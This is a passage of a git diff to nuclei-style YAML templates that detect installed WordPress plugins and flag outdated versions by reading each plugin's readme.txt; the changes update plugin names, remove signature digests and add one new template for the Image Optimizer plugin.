digest: 4a0a00473045022100895e3fc77d3548fc474fc643ecd8c88e286c2c9b3af50f1adabb6519dc84bd9e02204d882580bdb547dbf632eb44f5a6df1daceadb9cdef1189b26da1a6e6140130b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 304bf66f24..87c2aeb4bd 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/flamingo/ metadata: - max-request: 1 plugin_namespace: flamingo wpscan: https://wpscan.com/plugin/flamingo tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/flamingo/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220278422e662aa17f09c6b8841b754b40a8f6fdab710d975336023b157c6d29ecb02202f349c11e96d3c2fe4d7e4baf9838866030160d7f04fa39522b866f6285257c7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 4a17272d54..aa36122d85 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -1,19 +1,19 @@ id: wordpress-fluentform info: - name: Contact Form Plugin – Fastest Contact Form Builder Plugin for WordPress by Fluent Forms Detection + name: Contact Form Plugin by Fluent Forms for Quiz, Survey, and Drag & Drop WP Form Builder Detection author: ricardomaia severity: info reference: - https://wordpress.org/plugins/fluentform/ metadata: - max-request: 1 plugin_namespace: fluentform wpscan: https://wpscan.com/plugin/fluentform tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/fluentform/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220050590d17a79ace312ce86a78ab439bdcf2f5cd1385f4f3f5d2dae650cfe7a4502207c6e10a0285560e1f2170973a13ddc153aaf3d125b982556057bcdb6287e54b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index 80dceb7d32..8bab0a9c3e 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/font-awesome/ metadata: - max-request: 1 plugin_namespace: font-awesome wpscan: https://wpscan.com/plugin/font-awesome tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/font-awesome/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202a580cbc97ad923c5f9e0ba01adf3c062346f102e43307fac48ebc5ab4fdf9a302205b31093f4c5dff53d82827082494415d98590f72bfff85a8485de6cb2526ef47:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index 2f6b916d31..affd270123 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/force-regenerate-thumbnails/ metadata: - max-request: 1 plugin_namespace: force-regenerate-thumbnails wpscan: https://wpscan.com/plugin/force-regenerate-thumbnails tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/force-regenerate-thumbnails/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b10bb32bc79aec2059e3f5c1bad91272207b0da126ec1ce7ce804508dfe8b6f9022100eca670cb1543143c6574b2ae66e0ddc4bc2f064afeb8ddb807ee5c7a83260a88:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index f9eb2274c6..1d00a5705d 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -1,19 +1,19 @@ id: wordpress-formidable info: - name: Formidable Forms – Contact Form, Survey, Quiz, Payment, Calculator Form & Custom Form Builder Detection + name: Formidable Forms – Contact Form Plugin, Survey, Quiz, Payment, Calculator Form & Custom Form Builder Detection author: ricardomaia severity: info reference: - https://wordpress.org/plugins/formidable/ metadata: - max-request: 1 plugin_namespace: formidable wpscan: https://wpscan.com/plugin/formidable tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/formidable/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200ab4bb97356c59a5df4955cd90a7e963eb3adf2477d08b8d43eed87b0504702c0220599d9897ef9b599e95f4a7ea9f2482fe025f5bc4007a022657bec798e4227bbb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index 2c5ba8e5cc..980265f531 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/forminator/ metadata: - max-request: 1 plugin_namespace: forminator wpscan: https://wpscan.com/plugin/forminator tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/forminator/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220577b4e2cda128cb8f1c96248066fb9c479f58a9231efafa652bdac82e2995e0d02210092e0885396fbd96a882fa8fd42dc6e1723637b5adb10099cd0b327cf58f92bf2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index c9f6cf3ecc..daf205789d 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/ga-google-analytics/ metadata: - max-request: 1 plugin_namespace: ga-google-analytics wpscan: https://wpscan.com/plugin/ga-google-analytics tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/ga-google-analytics/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100dfad9a0bd496dcdac8fa201c02101952f97771aaa912a4560912fa9781f974f3022100d64d45ec9b292bebbfad4569e798c349ad5dd7a4cc06a2062577c49e5d0031e9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index d52ed11fdd..3dbb03067b 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -1,19 +1,19 @@ id: wordpress-gdpr-cookie-compliance info: - name: GDPR Cookie Compliance (CCPA, DSGVO, Cookie Consent) Detection + name: GDPR Cookie Compliance – Cookie Banner, Cookie Consent, Cookie Notice – CCPA, DSGVO, RGPD Detection author: ricardomaia severity: info reference: - https://wordpress.org/plugins/gdpr-cookie-compliance/ metadata: - max-request: 1 plugin_namespace: gdpr-cookie-compliance wpscan: https://wpscan.com/plugin/gdpr-cookie-compliance tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/gdpr-cookie-compliance/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022002c85986e3a0a646d477007ff3f2e4e7b452fa887083dca0c6ef9f4f17008edb022100fbca6b51b0bda3ed6cbdaf64c55952b847d25a0f32005ae1e5ad4813fb9aec6d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index f82ab165ee..7ed171d662 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/google-analytics-dashboard-for-wp/ metadata: - max-request: 1 plugin_namespace: google-analytics-dashboard-for-wp wpscan: https://wpscan.com/plugin/google-analytics-dashboard-for-wp tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/google-analytics-dashboard-for-wp/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206038e65fb23408a49191d8ac2baccfcb3415d90c4cda9b7e5538347a8244802e02204301485298075b68b765392d7b5bea8449df41e7d4af988bb04f88a196e0e972:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index fe1d4090a8..ad238445fc 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/google-analytics-for-wordpress/ metadata: - max-request: 1 plugin_namespace: google-analytics-for-wordpress wpscan: https://wpscan.com/plugin/google-analytics-for-wordpress tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/google-analytics-for-wordpress/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022058c0858eb490859cdfee38203f37304d7ee980f51d410ec71b3edfd2a0982ce2022100f0c33e819ecbbb3c027b51cb4837448d393728b6dfb20edb099c56060d5935c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index 0489d568d0..7161671960 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/google-listings-and-ads/ metadata: - max-request: 1 plugin_namespace: google-listings-and-ads wpscan: https://wpscan.com/plugin/google-listings-and-ads tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/google-listings-and-ads/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a6db2eee26f3ef933403087fcd949db4ae1ef14c4fabb6a9e68b127777711d5b022068f170eb46b58bed57b20ac1be71d5a40e456b9d7f75d7e6f9a5ce9e310a0b39:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 790623fbe4..2678f603c6 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/google-site-kit/ metadata: - max-request: 1 plugin_namespace: google-site-kit wpscan: https://wpscan.com/plugin/google-site-kit tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/google-site-kit/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100fbed97ae66b961fddddcd4d28588b65821565132d9149ea0dda5ca57ae8cfcc9022100a11de81da039bfdcfb224fefb82f01ed699a88b8bf764120bfdbd914f4cc007a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 35f86531c0..20d947a5d1 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/google-sitemap-generator/ metadata: - max-request: 1 plugin_namespace: google-sitemap-generator wpscan: https://wpscan.com/plugin/google-sitemap-generator tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/google-sitemap-generator/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022019c0b37a14c216fe4a5729ab1c8f3874970755a7b734ea614ca5fee9c8255fb102207cc0d6072ff0573aa77397bd974bbf7758a00415a37fdb7e6bbecf4be64c9bb5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 8f6eb0d03f..22ee97b51f 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/gtranslate/ metadata: - max-request: 1 plugin_namespace: gtranslate wpscan: https://wpscan.com/plugin/gtranslate tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/gtranslate/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210098341e7895dc6baf71876086d19b0e696296c43376e127d9a8218f414cea6d4d0220344c002ba8a8d6e6cafbbaf171e09f57b41c157308f1f20d9be952394bb64415:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index 839e940806..3f4c6c8936 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/gutenberg/ metadata: - max-request: 1 plugin_namespace: gutenberg wpscan: https://wpscan.com/plugin/gutenberg tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/gutenberg/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402205d95aad4c15ae2d2b15b12d63ab391f8f74177fd7be98650fbe4037c2551c7c9022007e6973993fa97b1a6eec461e7e4ee96e3a944b4ffd39fa4544b4091eb9b5010:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index 145fd31172..fa1bb64115 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/happy-elementor-addons/ metadata: - max-request: 1 plugin_namespace: happy-elementor-addons wpscan: https://wpscan.com/plugin/happy-elementor-addons tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/happy-elementor-addons/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220626024e1b3d553b62847c5f6aefeabd2470b7eedeae6ccbd3c61e658c02d994d0220549a762083080cde19f7f5fbfed0aa36b4931cd7042df15d188d55ff8d0cf8fe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index 4918e0e513..da63d1cbf6 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/header-footer-code-manager/ metadata: - max-request: 1 plugin_namespace: header-footer-code-manager wpscan: https://wpscan.com/plugin/header-footer-code-manager tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/header-footer-code-manager/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a1cdabcedd798f4d2a97329fd1724247a5116ace21f648e3b5cbc31c6e81df54022100a037fe25bb57ce262e569e2ff2eb3c1abb819c4069fb95d37959c45ec24d5aa3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index 8812216bb6..f94e7f6494 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/header-footer-elementor/ metadata: - max-request: 1 plugin_namespace: header-footer-elementor wpscan: https://wpscan.com/plugin/header-footer-elementor tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/header-footer-elementor/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e3624adea3cc3789406084dd058bd053cb2ca6b0deab77436b52fc1af73f93f6022100b7031aeaf7cee9b68b780496181e2048b9922d9cfb0765d493711d520c5d6f8b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 281b17aa86..95d2aa5f16 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/header-footer/ metadata: - max-request: 1 plugin_namespace: header-footer wpscan: https://wpscan.com/plugin/header-footer tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/header-footer/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022008c5182af358ccf96088e3adf6d986242f3fea210f8fdb14707c244246ea3833022100da7c9a4f055ea11b3020aa9e7f6c6c9286d9b07fa973c12f27ba87ca27092ac6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index 022048eadd..af8193b875 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/health-check/ metadata: - max-request: 1 plugin_namespace: health-check wpscan: https://wpscan.com/plugin/health-check tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/health-check/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100fd828ad114adbf6cb558d381a1c42c653bf6568abbaf5baec7fcf1ecc27e7f1302200d5f812cb00c1f4e62a112e6b14c936ffbb77613a3e1a4d4411b0d0321a3a4e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index e09e6f4aac..8d7e45818b 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/hello-dolly/ metadata: - max-request: 1 plugin_namespace: hello-dolly wpscan: https://wpscan.com/plugin/hello-dolly tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/hello-dolly/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022016ae954361248cabe936e0f6f6791254f5015ab0f52d60497e7c5ac247eef7700221009273e203642442907c55c4b54b4a0c960aff89e0fe07422464131bd3a7ea0bea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index 9044fbae61..ed3967db7b 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/host-webfonts-local/ metadata: - max-request: 1 plugin_namespace: host-webfonts-local wpscan: https://wpscan.com/plugin/host-webfonts-local tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/host-webfonts-local/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205ff8b2ab193d006636b28e53959b09406c57db5056d44812b35272c83e083577022100841d4c973cb97b078f1c04db42cbea1a255249ab72c65a4dbad27cf0b631a041:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hostinger.yaml b/http/technologies/wordpress/plugins/hostinger.yaml index d18304e63a..cd248e018b 100644 --- a/http/technologies/wordpress/plugins/hostinger.yaml +++ b/http/technologies/wordpress/plugins/hostinger.yaml @@ -1,19 +1,19 @@ id: wordpress-hostinger info: - name: Hostinger Detection + name: Hostinger Tools Detection author: ricardomaia severity: info reference: - https://wordpress.org/plugins/hostinger/ metadata: - max-request: 1 plugin_namespace: hostinger wpscan: https://wpscan.com/plugin/hostinger tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/hostinger/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022048841cfc7eec486ed6fd0ac8e2037bf05790ad619f19697a54ca3a31f561bc83022100d2a3ec8a3f9f6d68327003f2f93f5e29f63a1975fdc4af9304ec4bd914b7f1aa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/image-optimization.yaml b/http/technologies/wordpress/plugins/image-optimization.yaml new file mode 100644 index 0000000000..0993372ced --- /dev/null +++ b/http/technologies/wordpress/plugins/image-optimization.yaml @@ -0,0 +1,49 @@ +id: wordpress-image-optimization + +info: + name: Image Optimizer by Elementor – Compress, Resize and Optimize Images Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/image-optimization/ + metadata: + plugin_namespace: image-optimization + wpscan: https://wpscan.com/plugin/image-optimization + tags: tech,wordpress,wp-plugin,top-200 + +http: + - method: GET + + path: + - "{{BaseURL}}/wp-content/plugins/image-optimization/readme.txt" + + payloads: + last_version: helpers/wordpress/plugins/image-optimization.txt + + extractors: + - type: regex + part: body + internal: true + name: internal_detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index b7bd2a3d9a..7e62a84cca 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -1,19 +1,19 @@ id: wordpress-imagify info: - name: Imagify – Optimize Images & Convert WebP | Compress Images Easily Detection + name: Imagify – Optimize Images & Convert WebP & AVIF | Compress Images Easily Detection author: ricardomaia severity: info reference: - https://wordpress.org/plugins/imagify/ metadata: - max-request: 1 plugin_namespace: imagify wpscan: https://wpscan.com/plugin/imagify tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/imagify/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221009e58dda232d8c790034f18c1ac4f5ec1749f16a9795ca3ec8cfc84173c1c47170221009cbde47c0558fd1e210477f5099e2d2605897c75c91ea062d8e38f56a7b473f2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 07447cd817..9099f3c0a5 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/imsanity/ metadata: - max-request: 1 plugin_namespace: imsanity wpscan: https://wpscan.com/plugin/imsanity tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/imsanity/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d2cb71a61aedaf56da2b5f29460b90e75de6a6fa8440ac4e98b89a1292a2d76202207a9e337b57b4df4bd300e93f2efb2909fc2104afe5a0bd42ab87135f9c860ec8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index 4aebadbff1..1ee0e67542 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/insert-headers-and-footers/ metadata: - max-request: 1 plugin_namespace: insert-headers-and-footers wpscan: https://wpscan.com/plugin/insert-headers-and-footers tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/insert-headers-and-footers/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205f29d3df6cb8cd1dbcaea09a3bd0b5dfb97c738bb78c44bc914896d8b966021e022100e9ad07e16305a41cfe8eaa5a435e7c5cf5805675c8a06565e34b1ffe9e739b87:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index 34c7b0e559..c7ae2d51dd 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -1,19 +1,19 @@ id: wordpress-instagram-feed info: - name: Smash Balloon Social Photo Feed – Best Social Feed Plugin for WordPress Detection + name: Smash Balloon Social Photo Feed – Easy Social Feeds Plugin Detection author: ricardomaia severity: info reference: - https://wordpress.org/plugins/instagram-feed/ metadata: - max-request: 1 plugin_namespace: instagram-feed wpscan: https://wpscan.com/plugin/instagram-feed tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/instagram-feed/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f24e87fd73cdb8ffe8559259ca4588702bdb6d3cb55dc25f5feffdbd9c560c43022100822c0b3106547ed94b9527cfe00b3915c41fc7bbab2ac9cfed3a8fdd6bc8d7cd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index ea416cd6d5..7ba81036cf 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/intuitive-custom-post-order/ metadata: - max-request: 1 plugin_namespace: intuitive-custom-post-order wpscan: https://wpscan.com/plugin/intuitive-custom-post-order tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/intuitive-custom-post-order/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220406e88695e30b9570a4dd04659c44e85e7dbff3967930ac01323156eb9cd4ae9022100a5133d6e77d45cdf61a32b4c118f23ce089bc8cb6393aa32009f0146fda66db1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/iwp-client.yaml b/http/technologies/wordpress/plugins/iwp-client.yaml index 41e2149dc0..24fc3e3295 100644 --- a/http/technologies/wordpress/plugins/iwp-client.yaml +++ 